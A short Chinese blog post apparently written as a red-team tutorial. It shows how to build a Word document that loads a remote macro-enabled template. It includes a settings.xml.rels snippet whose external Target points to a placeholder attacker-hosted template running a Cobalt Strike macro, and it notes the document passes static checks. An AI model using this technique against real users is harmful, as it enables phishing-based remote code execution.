word远程模板执行宏

word远程模板执行宏

Posted by hmoytx on October 8, 2019

word远程模板执行宏

原理

Word远程模板执行宏就是利用Word文档加载附加模板时的缺陷所发起的恶意请求而达到的攻击目的,所以当目标用户点开攻击者发给他的恶意word文档就可以通过向远程服务器发送恶意请求的方式,然后加载模板执行恶意模板的宏。
这种攻击更常见的原因是,发送的文档本身是不带恶意代码的,能过很多静态的检测。

实践

要完成这系列操作,首先要有两个word文档,一个是docx的,一个是带有恶意宏的dotm文档,前者是没有问题的,只是多了指向恶意模板的目标链接。

创建带宏文档

这里不多说了,直接用的cobalt strike生成的宏代码。
191006_1
执行一下,测试能返回beacon,进行下一步。
191006_2

创建正常文档

生成一个正常的docx文件,内容根据实际需求进行编造,保存后将后缀改成zip。2007以后发布的docx格式实际上是一个包含了诸多内容配置rels和xml文件的zip文件,将其解压 191006_3

修改模板地址

修改./word/_rels/下的settings.xml.rels文件,没有的话可以自己添加。修改内容如下:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" 
Target="模板托管地址" 
TargetMode="External"/>
</Relationships>

191006_4
最后保存后重新压缩成zip,并修改后缀为docx,执行测试,能返回。
191006_5

总结

没有